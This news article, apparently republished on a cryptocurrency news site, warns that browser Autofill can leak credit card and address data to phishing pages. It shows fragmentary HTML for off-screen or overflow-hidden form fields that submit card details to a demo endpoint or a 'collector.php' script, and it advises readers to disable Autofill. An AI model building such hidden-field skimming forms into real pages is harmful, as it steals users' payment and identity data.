Everybody hates filling out web forms so some browsers offer a handy Autofill feature to automate the job for you. Unfortunately, it’s handy for hackers, too.
Hackers can abuse this feature to phish for your private information as well as credit card number, expiration date and cvc. Any website can have a lot of hidden fields that might get auto-filled and submitted without your knowledge. Take a quick look yourself:
GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF GIF
This proof-of-concept demo website consists of a simple online web form with just two fields: name and email. But what’s not visible are many out of sight fields, including the credit card information, phone number, organization, address, postal code, city etc. There’s more than one way of coding this, for example (linked demo site):
form action=”https://httpbin.org/post” method=”post”
input type=”text” name=”cc_number”
input type=”text” name=”cc_exp_month”
input type=”text” name=”cc_exp_year”
Notice the “margin-left:-500px” part that displays the text field out of the victim’s vision. This is not a regular type=”hidden” field.
The same result can be achieved by creating a specially crafted container using “overflow:hidden” attribute:
form action=”collector.php” method=”post”
input id=”00″ autocomplete=”cc-number”
input id=”01″ autocomplete=”cc-exp-month”
input id=”02″ autocomplete=”cc-exp-year”
These fields would also get auto-filled along with at least one visible, regular text field which is usually put in another container within the same form.
On the plus side, this method alone cannot capture passwords saved in the browser because they’re tied to a specific domain, but that’s not going to comfort someone that lost their identity and banking information.
Browsers vulnerable to the attack include Google Chrome, Apple Safari and Opera. On the other hand, if you use Mozilla Firefox or Tor, you don’t need to worry about this issue because Mozilla doesn’t support auto-filling multiple fields at once.
Since this method was first published in 2013, Chrome’s only response was implementing a warning message when credit card information is being submitted over HTTP, I am not expecting a fix anytime soon. Fraudsters can easily obtain a SSL certificate for free so I recommend disabling Autofill feature in your browser.
If you’re using Chrome, go to Settings – Show Advanced Settings (at the bottom) – uncheck Enable Autofill box to fill out web forms with a single click (under Passwords and Forms section).
TheBitcoinNews.com – Bitcoin News source since 2012
Virtual currency is not legal tender, is not backed by the government, and accounts and value balances are not subject to consumer protections. TheBitcoinNews.com holds several Cryptocurrencies, and this information does NOT constitute investment advice or an offer to invest.
Everything on this website can be seen as Advertisment and most comes from Press Releases, TheBitcoinNews.com is is not responsible for any of the content of or from external sites and feeds. Sponsored or guest posts, articles and PRs are NOT always flagged as this. Expert opinions and Price predictions are not supported by us and comes up from 3th part websites.
Advertise with us : Advertise